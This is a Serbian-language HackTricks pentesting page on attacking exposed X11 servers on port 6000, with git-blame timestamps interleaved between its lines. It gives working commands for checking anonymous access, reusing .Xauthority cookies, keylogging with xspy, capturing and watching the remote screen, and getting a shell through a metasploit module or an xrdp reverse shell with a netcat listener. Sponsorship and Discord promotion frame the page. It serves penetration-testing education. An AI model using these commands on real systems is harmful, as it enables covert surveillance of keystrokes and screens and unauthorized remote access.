2023-03-05 19:54:13 +00:00
# 6000 - Pentesting X11
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 13:11:20 +00:00
< summary > < strong > Naučite hakovanje AWS-a od nule do heroja sa< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 13:11:20 +00:00
Drugi načini podrške HackTricks-u:
2024-01-03 10:42:55 +00:00
2024-05-05 22:40:09 +00:00
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO** ](https://github.com/sponsors/carlospolop )!
2024-02-10 13:11:20 +00:00
* Nabavite [**zvanični PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2024-05-05 22:40:09 +00:00
* Otkrijte [**Porodičnu PEASS** ](https://opensea.io/collection/the-peass-family ), našu kolekciju ekskluzivnih [**NFT-ova** ](https://opensea.io/collection/the-peass-family )
2024-04-07 04:23:52 +00:00
* **Pridružite se** 💬 [**Discord grupi** ](https://discord.gg/hRep4RUj7f ) ili [**telegram grupi** ](https://t.me/peass ) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-02-10 13:11:20 +00:00
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repozitorijume.
2022-04-28 16:01:33 +00:00
< / details >
2024-05-05 22:40:09 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-02-10 13:11:20 +00:00
Pridružite se [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) serveru kako biste komunicirali sa iskusnim hakerima i lovcima na bagove!
2023-02-27 09:28:45 +00:00
2024-05-05 22:40:09 +00:00
**Hakerski Uvidi**\
2024-02-10 13:11:20 +00:00
Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja
2023-07-14 15:03:41 +00:00
2024-04-07 04:23:52 +00:00
**Vesti o Hakovanju u Realnom Vremenu**\
2024-02-10 13:11:20 +00:00
Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu
2023-07-14 15:03:41 +00:00
2024-05-05 22:40:09 +00:00
**Poslednje Najave**\
Budite informisani o najnovijim nagradama za pronalaženje bagova i bitnim ažuriranjima platformi
2022-11-05 09:07:43 +00:00
2024-02-10 13:11:20 +00:00
**Pridružite nam se na** [**Discord-u** ](https://discord.com/invite/N3FrSbmwdy ) i počnite da sarađujete sa vrhunskim hakerima danas!
2020-07-15 15:43:14 +00:00
2024-04-07 04:23:52 +00:00
## Osnovne Informacije
2020-07-15 15:43:14 +00:00
2024-05-05 22:40:09 +00:00
**X Window System** (X) je svestrani sistem prozora koji je prisutan na UNIX baziranim operativnim sistemima. Pruža okvir za kreiranje grafičkih **korisničkih interfejsa (GUI)** , pri čemu pojedini programi upravljaju dizajnom korisničkog interfejsa. Ova fleksibilnost omogućava raznolika i prilagodljiva iskustva unutar X okruženja.
2020-07-15 15:43:14 +00:00
2024-02-10 13:11:20 +00:00
**Podrazumevani port:** 6000
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
PORT STATE SERVICE
6000/tcp open X11
```
2024-02-10 13:11:20 +00:00
## Enumeracija
2020-07-15 15:43:14 +00:00
2024-04-07 04:23:52 +00:00
Proverite **anonimnu vezu:**
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script x11-access -p < PORT > < IP >
msf> use auxiliary/scanner/x11/open_x11
```
2024-04-07 04:23:52 +00:00
#### Lokalna enumeracija
2020-07-15 15:43:14 +00:00
2024-02-10 13:11:20 +00:00
Fajl ** `.Xauthority` ** u korisničkom folderu se **koristi** od strane **X11 za autorizaciju** . Sa [**ovde** ](https://stackoverflow.com/a/37367518 ):
2023-12-29 08:56:54 +00:00
```bash
$ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M
00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d IT-MAGIC-COOKIE-
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X
00000030: 041d ef ...
```
2024-05-05 22:40:09 +00:00
> MIT-magic-cookie-1: Generisanje 128 bitnog ključa ("kolačića"), čuvanje u \~/.Xauthority (ili tamo gde XAUTHORITY envvar pokazuje). Klijent ga šalje serveru čisto! server proverava da li ima kopiju ovog "kolačića" i ako ima, veza je dozvoljena. ključ se generiše pomoću DMX.
2023-04-07 00:41:31 +00:00
{% hint style="warning" %}
2024-04-07 04:23:52 +00:00
Da biste **koristili kolačić** , treba postaviti env var: ** `export XAUTHORITY=/putanja/do/.Xauthority` **
2023-04-07 00:41:31 +00:00
{% endhint %}
2024-04-07 04:23:52 +00:00
#### Lokalna Sesija Nabrojavanja
2023-12-29 08:56:54 +00:00
```bash
2024-02-10 13:11:20 +00:00
$ w
23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12
2023-12-29 08:56:54 +00:00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session
```
2024-04-07 04:23:52 +00:00
## Provera konekcije
2020-07-15 15:43:14 +00:00
```bash
xdpyinfo -display < ip > :< display >
xwininfo -root -tree -display < IP > :< display > #Ex: xwininfo -root -tree -display 10.5.5.12:0
```
2024-05-05 22:40:09 +00:00
## Keylogovanje
2020-07-15 15:43:14 +00:00
2024-05-05 22:40:09 +00:00
[xspy ](http://tools.kali.org/sniffingspoofing/xspy ) za špijuniranje unosa sa tastature.
2020-07-15 15:43:14 +00:00
2024-02-10 13:11:20 +00:00
Primer izlaza:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
xspy 10.9.xx.xx
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
```
2024-04-07 04:23:52 +00:00
## Snimanje ekrana
2024-02-10 13:11:20 +00:00
```bash
xwd -root -screen -silent -display < TargetIP:0 > > screenshot.xwd
convert screenshot.xwd screenshot.png
```
2024-04-07 04:23:52 +00:00
## Daljinski prikaz radne površine
2020-07-15 15:43:14 +00:00
2024-05-05 22:40:09 +00:00
Put od: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref ](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref )
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
./xrdp.py < IP:0 >
```
2024-04-07 04:23:52 +00:00
Putanja od: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html ](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html )
2020-07-15 15:43:14 +00:00
2024-04-07 04:23:52 +00:00
Prvo moramo pronaći ID prozora koristeći xwininfo
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
xwininfo -root -display 10.9.xx.xx:0
xwininfo: Window id: 0x45 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0
```
**XWatchwin**
2024-05-05 22:40:09 +00:00
Za **live pregled** moramo koristiti
2020-07-15 15:43:14 +00:00
```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
```
2024-05-05 22:40:09 +00:00
## Dobijanje ljuske
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
msf> use exploit/unix/x11/x11_keyboard_exec
```
2024-02-10 13:11:20 +00:00
Drugi način:
2020-07-15 15:43:14 +00:00
2024-05-05 22:40:09 +00:00
**Obrnuti Shell:** Xrdp takođe omogućava da se dobije obrnuti shell putem Netcat-a. Ukucajte sledeću komandu:
2024-02-08 21:36:35 +00:00
```bash
./xrdp.py \<IP:0> –
```
2024-04-07 04:23:52 +00:00
U interfejsu možete videti **R-shell opciju** .
2020-07-15 15:43:14 +00:00
2024-04-07 04:23:52 +00:00
Zatim pokrenite **Netcat osluškivač** na vašem lokalnom sistemu na portu 5555.
2024-02-08 21:36:35 +00:00
```bash
nc -lvp 5555
```
2024-04-07 04:23:52 +00:00
Zatim, unesite svoju IP adresu i port u opciju **R-Shell** i kliknite na **R-shell** da biste dobili shell
2020-07-15 15:43:14 +00:00
2024-02-10 13:11:20 +00:00
## Reference
2024-04-07 04:23:52 +00:00
2024-02-08 21:36:35 +00:00
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref ](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref )
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html ](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html )
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref ](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref )
2020-09-24 20:01:29 +00:00
2023-03-05 19:54:13 +00:00
## Shodan
2020-09-24 20:01:29 +00:00
* `port:6000 x11`
2022-04-28 16:01:33 +00:00
2024-05-05 22:40:09 +00:00
< figure > < img src = "../.gitbook/assets/image (380).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-07-14 15:03:41 +00:00
2024-02-10 13:11:20 +00:00
Pridružite se [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ) serveru kako biste komunicirali sa iskusnim hakerima i lovcima na bagove!
2022-11-05 09:07:43 +00:00
2023-12-04 15:45:05 +00:00
**Hacking Insights**\
2024-02-10 13:11:20 +00:00
Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja
2023-02-27 09:28:45 +00:00
2024-05-05 22:40:09 +00:00
**Vesti o hakovanju u realnom vremenu**\
2024-04-07 04:23:52 +00:00
Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu
2023-02-27 09:28:45 +00:00
2024-05-05 22:40:09 +00:00
**Poslednje objave**\
2024-04-07 04:23:52 +00:00
Budite informisani o najnovijim nagradama za pronalaženje bagova i važnim ažuriranjima platforme
2023-02-27 09:28:45 +00:00
2024-02-10 13:11:20 +00:00
**Pridružite nam se na** [**Discord-u** ](https://discord.com/invite/N3FrSbmwdy ) i počnite da sarađujete sa vrhunskim hakerima danas!
2022-11-05 09:07:43 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 13:11:20 +00:00
< summary > < strong > Naučite hakovanje AWS-a od nule do heroja sa< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 13:11:20 +00:00
Drugi načini podrške HackTricks-u:
2024-01-03 10:42:55 +00:00
2024-05-05 22:40:09 +00:00
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU** ](https://github.com/sponsors/carlospolop )!
2024-02-10 13:11:20 +00:00
* Nabavite [**zvanični PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* Otkrijte [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), našu kolekciju ekskluzivnih [**NFT-ova** ](https://opensea.io/collection/the-peass-family )
2024-04-07 04:23:52 +00:00
* **Pridružite se** 💬 [**Discord grupi** ](https://discord.gg/hRep4RUj7f ) ili [**telegram grupi** ](https://t.me/peass ) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-05-05 22:40:09 +00:00
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repozitorijume.
2022-04-28 16:01:33 +00:00
< / details >
